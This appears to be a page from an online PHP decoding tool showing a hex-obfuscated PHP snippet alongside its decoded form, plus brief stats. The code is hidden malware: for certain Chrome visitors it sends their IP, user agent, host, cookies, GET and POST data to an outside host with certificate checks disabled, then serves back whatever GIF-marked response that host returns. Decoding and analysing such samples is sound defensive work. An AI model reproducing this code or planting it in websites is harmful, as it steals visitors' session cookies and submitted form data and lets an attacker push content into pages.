Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php if (isset($_COOKIE)) { if (strpos($_SERVER["\x48\124\124\120\x5f\x55\x53\x45\x52\137..

Decoded Output download

<?php if (isset($_COOKIE)) { if (strpos($_SERVER["HTTP_USER_AGENT"], "Chrome") !== false) { if (preg_match("/![A-F0-9]{10}!/", "!" . implode("!", array_keys($_COOKIE)) . "!")) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "https://hotheads.co.za/index.php"); curl_setopt($ch, CURLOPT_POST, TRUE); curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); $d = array("i" => serialize($_SERVER["REMOTE_ADDR"]), "u" => serialize($_SERVER["HTTP_USER_AGENT"]), "h" => serialize($_SERVER["HTTP_HOST"]), "c" => serialize($_COOKIE), "g" => serialize($_GET), "p" => serialize($_POST)); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($d)); $r = curl_exec($ch); curl_close($ch); if (strpos($r, "GIF89") !== false) { header("Content-Type: image/gif"); echo $r; die; } } } } ?>

Did this file decode correctly?

Original Code

<?php if (isset($_COOKIE)) { if (strpos($_SERVER["\x48\124\124\120\x5f\x55\x53\x45\x52\137\101\107\105\116\x54"], "\x43\150\162\x6f\155\145") !== false) { if (preg_match("\57\x21\133\101\x2d\106\x30\55\71\135\x7b\61\x30\x7d\x21\x2f", "\41" . implode("\x21", array_keys($_COOKIE)) . "\41")) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "\x68\164\x74\160\x73\72\x2f\57\x68\157\x74\150\x65\141\x64\163\x2e\143\x6f\56\x7a\141\x2f\151\x6e\144\x65\170\x2e\160\x68\160"); curl_setopt($ch, CURLOPT_POST, TRUE); curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); $d = array("\x69" => serialize($_SERVER["\x52\x45\115\117\124\x45\137\x41\104\x44\x52"]), "\165" => serialize($_SERVER["\110\x54\x54\x50\x5f\x55\123\105\122\137\101\x47\x45\x4e\x54"]), "\x68" => serialize($_SERVER["\x48\x54\x54\x50\x5f\110\117\x53\124"]), "\x63" => serialize($_COOKIE), "\x67" => serialize($_GET), "\x70" => serialize($_POST)); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($d)); $r = curl_exec($ch); curl_close($ch); if (strpos($r, "\x47\111\x46\x38\71") !== false) { header("\x43\x6f\156\x74\145\156\164\55\124\x79\x70\x65\72\40\151\x6d\141\x67\x65\57\x67\x69\x66"); echo $r; die; } } } } ?>

Function Calls

strpos 1
array_keys 1

Variables

None

Stats

MD5 99312a2cadae9e3766f03279f2d48c89
Eval Count 0
Decode Time 101 ms